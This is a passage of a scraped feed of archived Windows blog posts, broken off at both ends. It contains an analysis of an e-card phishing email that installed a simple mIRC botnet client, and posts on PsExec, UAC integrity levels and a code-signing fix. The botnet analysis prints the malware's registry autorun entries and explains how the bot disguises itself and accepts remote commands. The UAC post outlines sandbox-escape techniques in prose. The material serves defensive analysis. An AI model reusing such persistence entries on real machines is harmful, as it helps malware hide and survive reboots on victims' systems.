style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> <SHAPETYPE coordsize="21600,21600" filled="f" id="_x0000_t75" preferrelative="t" spt="75" path="m@4@5l@4@11@9@11@9@5xe" stroked="f"> <STROKE joinstyle="miter"> </STROKE> <FORMULAS> <F eqn="if lineDrawn pixelLineWidth 0"> </F> <F eqn="sum @0 1 0"> </F> <F eqn="sum 0 0 @1"> </F> <F eqn="prod @2 1 2"> </F> <F eqn="prod @3 21600 pixelWidth"> </F> <F eqn="prod @3 21600 pixelHeight"> </F> <F eqn="sum @0 0 1"> </F> <F eqn="prod @6 1 2"> </F> <F eqn="prod @7 21600 pixelWidth"> </F> <F eqn="sum @8 21600 0"> </F> <F eqn="prod @7 21600 pixelHeight"> </F> <F eqn="sum @10 21600 0"> </F> </FORMULAS> <PATH gradientshapeok="t" connecttype="rect" extrusionok="f"> </PATH> <LOCK aspectratio="t" ext="edit"> </LOCK> </SHAPETYPE> </SPAN> </P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> There are a couple of immediate clues that the email is a fake. For example, the body doesn’t address me by name and there’s a space between “friend” and the exclamation point. Hovering the mouse over the link shows that it masks an address at a different site, but the presence of BlueMountains and the legitimate-looking KoKoCards in the name might be sufficient to fool a casual scan. </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> Curious to see what kind of con the email was perpetrating, I fired up a virtual machine that was isolated from the local network and clicked on the link. Instead of being taken to a web site like I expected, an Internet Explorer dialog appeared and asked me if I wanted to save or run “Postcard.jpg.exe.” Most users that might have followed the ruse this far would probably be suspicious and not run it, but out of curiosity I started Process Monitor to watch the action and ran it. What I found isn’t very sophisticated, but it’s interesting because it’s an email virus that’s making the rounds today. </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> First I saw the flash of a command prompt window starting and exiting and then a prompt from the firewall appeared: </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <IMG height="250" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741365/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741365/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120963iF74CFD35508E90DC" style="WIDTH: 348px; HEIGHT: 250px" width="348" /> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> I immediately recognized that the program wanting through the firewall is a popular Internet Relay Chat (IRC) client. I unblocked it, waited a couple of minutes, and then turned my attention to Process Monitor to see what had transpired. I opened the process tree tool from the Tools menu, which shows all the processes that generated activity in a tracing session, including ones that have exited. I saw evidence of the initial installer, the command prompt that I had seen, and a Regedit child process of the command prompt, all of which have faded icons to show that they had exited by the end of the collected trace: </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <IMG height="387" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741367/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741367/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120964i490A9A7CA567240E" style="WIDTH: 423px; HEIGHT: 387px" width="423" /> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> The command prompt’s command line, visible in the process tree, indicates that it was launched to execute a batchfile, sup.bat. Sup.bat was left in the System32 directory, so I could see from its contents that it passes Regedit a registry file named sup.reg, which creates two auto-start entries: </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> REGEDIT4 <BR /> [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] <BR /> "taskmgr"="C:\\WINNT\\system32\\explorer.exe" <BR /> "IExplorer"="C:\\WINDOWS\\system32\\explorer.exe" </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The seemingly redundant entries simply ensure that mIRC will autostart when the system boots regardless of whether the system directory is Winnt or Windows. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> The process tree showed only one additional process still running, mIRC, which was using Explorer as its cover name to blend into the list of legitimate programs a user would see in Task Manager. Process Monitor of course reveals “explorer’s” true identify by showing the mIRC icon, description and company name: </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <IMG height="387" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741368/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741368/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120965iB98DAC0C956FBDD2" style="WIDTH: 423px; HEIGHT: 387px" width="423" /> </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> The mIRC I had on my system was unmodified from the one on the mIRC homepage. My guess is that the malware author didn’t alter the description or company name because they don’t show up in versions of Task Manager prior to the one in Windows Vista, and antivirus is left faced with the difficult position of flagging a legitimate program as malware. </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> Having completed my examination of the process tree, I returned to Process Monitor’s tracing window and scanned through the output. I set a Category filter to include operations in the Write category, which narrowed the output to modifications made during the installation and first run of mIRC. I quickly ran across a string of writes to .ini files in the \Windows\System32 directory: </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <IMG height="335" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741371/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741371/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120966iA11D933C85B3C9A0" style="WIDTH: 622px; HEIGHT: 335px" width="622" /> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> I’m not familiar with mIRC, but after studying the contents of the files for a few minutes I figured out that the files cause mIRC to automatically join chat channels named mp3-w4r3z and mp3-download on a chat server randomly selected from the ones stored in the Server.ini file, all of which are in the undernet.org domain. <SPAN style="mso-spacerun: yes"> </SPAN> Finally, the heart of the operation is the script.ini file, which appears to implement commands that remote users can execute, including “run.” </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> At this point I concluded that what I had installed was a very simple Botnet client. I left it running for several hours, but didn’t notice any further activity. <SPAN style="mso-spacerun: yes"> </SPAN> Surprised that the system hadn’t become an active Bot, I opened mIRC and manually connected to several of the servers listed in the Servers.ini file, but none of them had mp3-w4r3z or mp3-download channels, so they had either been shut down or hadn’t been configured, yet. </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> A few days later I received a similar email, but this time Microsoft’s spam server had stripped the contents and indicated that what I had installed was Trojan-Spy.HTML.Pcard.w, but an Internet search for more information didn’t yield anything meaningful. </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> </P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> <IMG height="452" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741503/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/741503/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120967iF72E8FD2E2DAEBB0" style="WIDTH: 498px; HEIGHT: 452px" width="498" /> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> I’m left wondering how successfully this type of lure brings users into a Bot herder’s web. There are numerous warnings that something funny is going on, from the lack of personalization to being asked to run a program and open a port in the firewall (and on Windows Vista there’s an additional UAC elevation prompt to give administrative privileges to Postcard.jpg.exe). <SPAN style="mso-spacerun: yes"> </SPAN> The fact that this Bot herder didn’t bother with more sophistication leads me to believe that it’s still unnecessary: enough people ignore the warnings. </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> Users will get more wary, however, so we’re in store for craftier attacks that will fool even paranoid users. Other spam and virus emails I’ve received address me as Mark, which I assume they get from my old mark@sysinternals.com address, but there are other tricks for guessing or even obtaining a user’s name, like contact harvesting. <SPAN style="mso-spacerun: yes"> </SPAN> Exploits of zero-day and unpatched vulnerabilities can deliver malware without user interaction, and malware can use communications techniques, like proxy servers, http traffic, or outbound-initiated bidirectional connections, to avoid causing firewall popups. <SPAN style="mso-spacerun: yes"> </SPAN> <SPAN style="mso-spacerun: yes"> </SPAN> </FONT></FONT></P><P> </P> <P></P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Windows Vista’s UAC and Protected Mode IE can help mitigate attacks, but adoption will take time and even these technologies give malware <A class="" href="#" mce_href="#" target="_blank"> a lot of room to play </A> </FONT> <FONT size="3"> <FONT face="Calibri"> . <SPAN style="mso-spacerun: yes"> </SPAN> There’s work going on at Microsoft to address these threats, but there’s no silver bullet. The fight against malware continues. </FONT> </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:32:15 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/botnets-by-email/ba-p/723559 MarkRussinovich 2019-06-27T06:32:15Z PsExec, User Account Control and Security Boundaries https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/psexec-user-account-control-and-security-boundaries/ba-p/723551 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Feb 12, 2007 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I introduced the -l switch to <A class="" href="#" mce_href="#" target="_blank"> PsExec </A> about a year and a half ago as an easy way to execute processes with standard-user rights from an administrative account on Windows XP. In <A class="" href="#" mce_href="#" target="_blank"> Running as Limited User – The Easy Way </A> </FONT> <FONT face="Calibri" size="3"> I described how PsExec uses the CreateRestrictedToken API to create a security context that’s a version of the one your account is using, only without membership in the local administrators group or any of the privileges, such as Debug Programs, that are assigned to administrators. <SPAN style="mso-spacerun: yes"> </SPAN> A process running with that kind of security context has the privileges and accesses of a standard user account, which prevents it from modifying system files and Registry keys or exercising privileges, like loading a device driver, that only administrators can perform. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> There’s only one catch to the virtual sandbox the restricted token creates: processes running in the sandbox are running as you, and so can read and write any files, Registry keys, and even other processes to which your account has access. That caveat creates major gaps in the walls of the sandbox and malicious code written with awareness of the restricted environment could take advantage of them to escape and become full administrator. An easy way out is for the malware to simply use OpenProcess to gain access to one of your processes running outside the sandbox and to inject into it code and a thread to execute the code. Because your other processes are running as you and the Windows security model creates default permissions that grant your account full access to your processes, a sandboxed process will be able to open them. Another way out is to send window messages from the limited process to a normal process, like Explorer, and drive the normal process with synthesized mouse and keyboard input so that it executes code at the direction of the malware. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Given these holes, why do I still recommend using the PsExec feature to run processes with limited rights on Windows XP if you would rather use an administrator instead of standard user account? Because this type of sandbox has not been commonly used, malware authors haven’t bothered with writing the code necessary to escape and so they run into the walls. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Windows Vista changes that, however, because it uses an enhanced form of this sandbox in User Account Control (UAC) and Protected Mode Internet Explorer (IE). Let’s look at Vista’s version of the sandbox, how PsExec’s update lets you run programs in it, and explore its security implications. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> UAC creates an alternate model where all users, including administrators, run with standard user rights. Executables that require administrative rights include a requestedExecutionLevel key in their manifest - XML embedded in their executable - that specifies “requireAdministrator”. When an administrator executes such an image, in its default configuration UAC presents a Consent dialog that asks permission for the image to run with administrative rights. Standard users see a similar dialog, but must enter the credentials of an administrative account to unlock administrative rights. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The act of giving an executable administrative rights is called “elevation” in UAC. Whether you elevate from a standard user account (Over the Shoulder – OTS - elevation) or from an administrative account (Admin Approval Mode – AAM - elevation), you create processes that have administrative rights on the same desktop as those that have standard user rights. <SPAN style="mso-spacerun: yes"> </SPAN> Processes elevated from a standard user account run in a different account from those with standard user rights, so the Windows security model defines a wall around the elevated process that prevents the non-elevated processes from writing code into those that are elevated. However, the standard Windows security model <SPAN style="mso-spacerun: yes"> </SPAN> does not prevent non-elevated processes from sending fake input into elevated processes, nor does it create a sandbox around the non-elevated processes of administrative users to stop the processes from compromising the administrator’s elevated processes. Windows Vista therefore introduces the Windows Integrity mechanism, which supplies additional fencing for the sandbox surrounding less-privileged processes. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> In Vista’s integrity model, every process runs at an integrity level (IL) and every securable object has an integrity level. The primary integrity levels are low, medium (the default), high (for elevated processes) and system. The windowing system honors integrity levels to prevent lower-IL processes from sending all but a few informational window messages to the windows owned by processes of a higher IL, calling this protection User Interface Privilege Isolation (UIPI). The security model also changes in Vista to only allow a process to open an object for write access if the process IL is equal to or higher than that of the object. Further, to prevent access to secrets stored in memory, processes can’t open processes of a higher IL for read access. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> If you add the Integrity Level column to Process Explorer’s display, as seen in the screenshot below, you can see that system processes, including Windows service processes, run at System IL. Most processes of your logon session run at Medium, any processes you elevated are at High, and Internet Explorer (IE) runs at Low when you have Protected Mode enabled. You can use the built-in icacls.exe utility to view and change the ILs of files and directories and the Sysinternals <A class="" href="#" mce_href="#" target="_blank"> AccessChk </A> </FONT> <FONT face="Calibri" size="3"> tool shows ILs of files, directories, registry keys, and processes. Objects have a default IL of medium and you can use AccessChk’s -e option to search for objects that have an explicit IL. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <IMG height="377" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/638306/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/638306/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120960iB1C4CCA04EC05C11" style="WIDTH: 528px; HEIGHT: 377px" width="528" /> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> <SHAPETYPE coordsize="21600,21600" filled="f" id="_x0000_t75" preferrelative="t" spt="75" path="m@4@5l@4@11@9@11@9@5xe" stroked="f"> <STROKE joinstyle="miter"> </STROKE> <FORMULAS> <F eqn="if lineDrawn pixelLineWidth 0"> </F> <F eqn="sum @0 1 0"> </F> <F eqn="sum 0 0 @1"> </F> <F eqn="prod @2 1 2"> </F> <F eqn="prod @3 21600 pixelWidth"> </F> <F eqn="prod @3 21600 pixelHeight"> </F> <F eqn="sum @0 0 1"> </F> <F eqn="prod @6 1 2"> </F> <F eqn="prod @7 21600 pixelWidth"> </F> <F eqn="sum @8 21600 0"> </F> <F eqn="prod @7 21600 pixelHeight"> </F> <F eqn="sum @10 21600 0"> </F> </FORMULAS> <PATH gradientshapeok="t" connecttype="rect" extrusionok="f"> </PATH> <LOCK aspectratio="t" ext="edit"> </LOCK> </SHAPETYPE> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The new version of Psexec </FONT> <FONT face="Calibri" size="3"> takes advantage of the enhanced Vista sandbox when you specify the -l switch, running the executable you specify with a standard user token at low IL. The sandbox PsExec creates is almost identical to the one surrounding Protected Mode IE and you can feel your way around the walls by launching a command prompt or Regedit at low IL and then seeing what you can modify. <SPAN style="mso-spacerun: yes"> </SPAN> For example, I launched the command prompt seen below at low IL with this command: psexec -l -d cmd.exe </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <SPAN style="mso-no-proof: yes"> </SPAN> <SPAN style="mso-spacerun: yes"> <FONT face="Calibri" size="3"> <IMG height="420" mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/638307/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/638307/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120961i2506D8C21006830B" style="WIDTH: 467px; HEIGHT: 420px" width="467" /> </FONT> </SPAN> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I first determined my profile’s temporary directory with the “set” command. When I tried to create a file in that directory I was denied access because the directory has a default IL of Medium, which is indicated by the fact that there’s no IL specified in Icacl’s output. Then I changed to Protected Mode IE’s temporary directory, which has an IL of Low, and successfully created a file. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> As you experiment you’ll find that your actions are limited, but there are some design boundaries that you should be aware of. First, with the exception of processes and threads, the wall doesn’t block reads. That means that your low-IL command prompt or Protected Mode IE can read objects that your account (the standard-user version if you’re a member of the administrator’s group) can. This potentially includes a user’s documents and registry keys. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Even the ability of a process at low IL to manipulate objects of a higher IL isn’t necessarily prevented. Since processes running at different integrities are sharing the same desktop they share the same “session”. <SPAN style="mso-spacerun: yes"> </SPAN> Each user logon results in a new session in which the processes of the user execute. The session also defines a local namespace through which the user’s processes can communicate via shared objects like synchronization objects and shared memory. That means that a process with a low IL could create a shared memory object (called a section or memory-mapped file) that it knows a higher IL process will open, and store data in the memory that causes the elevated process to execute arbitrary code if the elevated process doesn’t properly validate the data. That kind of escape, called a squatting attack, is sophisticated, requires the user to execute processes in a specific order and requires knowledge of the internal operation of an application that is susceptible to manipulation through shared objects. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> However, let’s be clear that no matter how difficult to pull off, the mere possibility of such a breach of a sandbox wall implies that ILs, in and of themselves, do not define security boundaries. <SPAN style="mso-spacerun: yes"> </SPAN> What’s a security boundary? It’s a wall through which code and data can’t pass without the authorization of a security policy. User accounts running in separate sessions are separated by a Windows security boundary, for example. One user should not be able to read or modify the data of another user, nor be able to cause other users to execute code, without the permission of the other user. If for some reason it was possible to bypass security policy, it would mean that there was a security bug in Windows (or third-party code that allows it). </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> It should be clear then, that neither UAC elevations nor Protected Mode IE define new Windows security boundaries. Microsoft has been communicating this but I want to make sure that the point is clearly heard. Further, as Jim Allchin pointed out in his blog post <A class="" href="#" mce_href="#" target="_blank"> Security Features vs Convenience </A> , </FONT> <FONT size="3"> <FONT face="Calibri"> Vista makes tradeoffs between security and convenience, and both UAC and Protected Mode IE have design choices that required paths to be opened in the IL wall for application compatibility and ease of use. <SPAN style="mso-spacerun: yes"> </SPAN> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Not requiring a user to type Ctrl+Alt+Delete to verify that the credential dialog UAC presents for an OTS elevation is one example of security balanced against usability, but there are others, like the ones I describe in my TechEd/ITForum talk <A class="" href="#" mce_href="#" target="_blank"> User Account Control Internals and Impact on Malware </A> </FONT> <FONT size="3"> <FONT face="Calibri"> (Jim’s post describes some of the ways you can enhance security while tipping the balance against ease of use, like configuring Windows to require Ctrl+Al+Delete for the credential dialog). For instance, having your elevated AAM processes run in the same account as your other processes gives you the convenience of allowing your elevated processes access to your account’s code and data, but at the same time allows your non-elevated processes to modify that same code and data to potentially cause an elevated process to load arbitrary code. <SPAN style="mso-spacerun: yes"> </SPAN> <SPAN style="mso-spacerun: yes"> </SPAN> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri"> <FONT size="3"> Because elevations and ILs don’t define a security boundary, potential avenues of attack </FONT> <SPAN class="MsoCommentReference"> <SPAN style="FONT-SIZE: 8pt; LINE-HEIGHT: 115%"> </SPAN> </SPAN> <FONT size="3"> , regardless of ease or scope, are not security bugs. So if you aren’t guaranteed that your elevated processes aren’t susceptible to compromise by those running at a lower IL, why did Windows Vista go to the trouble of introducing elevations and ILs? To get us to a world where everyone runs as standard user by default and all software is written with that assumption. </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri"> <FONT size="3"> Without the convenience of elevations most of us would continue to run the way we have on previous versions of Windows: with administrative rights all the time. Protected Mode IE and PsExec’s -l option simply take advantage of ILs to create a sandbox around malware that gets past other security defenses. The elevation and Protected Mode IE sandboxes might have potential avenues of attack </FONT> <SPAN class="MsoCommentReference"> <SPAN style="FONT-SIZE: 8pt; LINE-HEIGHT: 115%"> </SPAN> </SPAN> <FONT size="3"> , but they’re better than no sandbox at all. <SPAN style="mso-spacerun: yes"> </SPAN> If you value security over any convenience you can, of course, leverage the security boundary of separate user accounts by running as standard user all the time and switching to dedicated accounts for unsafe browsing and administrative activities. <SPAN style="mso-spacerun: yes"> </SPAN> </FONT> </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> Look for my in-depth article on UAC internals in the June issue of TechNet Magazine, and if you want if you want to learn about other changes in Windows Vista then&nbsp;check out the first of my three-part <A class="" href="#" mce_href="#" target="_blank"> Inside the Vista Kernel </A> </FONT> <FONT face="Calibri" size="3"> article series in the February issue of TechNet Magazine. </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:31:31 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/psexec-user-account-control-and-security-boundaries/ba-p/723551 MarkRussinovich 2019-06-27T06:31:31Z The Case of the Mysterious Code Signing Failures https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-mysterious-code-signing-failures/ba-p/723548 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Dec 11, 2006 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I <A class="" href="#" mce_href="#" target="_blank"> digitally sign code </A> on a regular basis in the course of preparing Sysinternals executables for upload to the site. When you digitally sign a file, you encrypt the hash of the file with the private key of a public/private key pair. Someone can verify that you’ve signed the file by decrypting the encrypted hash with your public key and comparing the result with the hash of the file they calculate themselves. <SPAN style="mso-spacerun: yes"> </SPAN> The signing process is made simple with <A class="" href="#" mce_href="#" target="_blank"> Signtool.exe </A> , a utility that comes with the Platform SDK and the .NET Framework. You pass it your signing certificate, private key file, and target file as command-line arguments and it does the rest, appending the signed hash in the file as a final step. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The other day I went to sign an updated Sysinternals tool and ran into this error message: </FONT> </P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551778/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551778/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120956i54909C8F5DA7ABA3" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> It had been a week or so since the last time I had tried signing anything, but I couldn’t think of any changes I had made to the system that would have lead to this failure. <SPAN style="mso-spacerun: yes"> </SPAN> However, anyone that’s used computers for any length of time knows that they’re not really deterministic and that system configuration is often subject to spontaneous corruption. I resigned myself to never knowing the root cause and set out to resolve the problem. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The first thing I did was search for capicom.dll with the built-in Where utility, which looks for the file you specify in each of the directories listed in the PATH environment variable. The PATH environment variable is used for DLL searches, so I expected this step to confirm that I was missing Capicom.dll: </FONT> </P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551779/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551779/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120957i5B0BDB8DF25BFF28" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The output appeared to confirm it, but then I realized that because I was running on a 64-bit system and Signtool is a 32-bit executable, Where.exe wouldn’t look in the %SystemRoot%\Syswow64 directory, which is the directory in which 32-bit system DLLs are stored. When I manually looked in that directory I was surprised to find a copy of Capicom.dll: </FONT> </P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551780/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551780/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120958iF204A4B4D3C38047" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT size="3"> <FONT face="Calibri"> Signtool must therefore not be looking for Capicom.dll in the directories listed in the PATH environment variable, so the question before me was, where was Signtool looking? I knew <A class="" href="#" mce_href="#" target="_blank"> Process Monitor </A> was the perfect tool to answer a question like that, so ran it, configured an Include filter for any Path ending in “capicom.dll” and then repeated the Nmake command that triggered the error: <SPAN style="mso-no-proof: yes"> </SPAN> </FONT> </FONT> </P> <IMG mce_src="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551782/original.aspx" original-url="http://blogs.technet.com/photos/markrussinovichhttps://techcommunity.microsoft.com/images/551782/original.aspx" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/120959i314A790D2CE3D4B5" /> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> The trace shows that, for some reason, Signtool only looks for Capicom.dll in two directories: <SPAN style="mso-spacerun: yes"> </SPAN> the Microsoft Shared sub-directory of the system’s Common Files directory, and the \Bin directory, which was where Signtool is located on my system. </FONT> </P> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> To fix the problem I simply copied the Capicom.dll file from the \Windows\Syswow64 to the \Bin directory. I reran the make command&nbsp;and, as I expected, it succeeded. Process Monitor to the rescue! </FONT> </P> </BODY></HTML> Thu, 27 Jun 2019 06:31:13 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-mysterious-code-signing-failures/ba-p/723548 MarkRussinovich 2019-06-27T06:31:13Z The Case of the Delayed Windows Vista File Open Dialogs https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-delayed-windows-vista-file-open-dialogs/ba-p/723543 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Nov 27, 2006 </STRONG> <BR /> <P class="MsoNormal" style="MARGIN: 0in 0in 10pt"> <FONT face="Calibri" size="3"> I was in Barcelona a couple of weeks ago speaking at Microsoft’s TechEd/ITForum conference, where I delivered several sessions (two, Advanced Malware Cleaning and Windows Vista Kernel Changes earned the top #1 and #2 rated breakout sessions for the week - you can see an interview of me at the conference <A class="" href="#" mce_href="#" target="_blank"> here </A> </FONT> <FONT 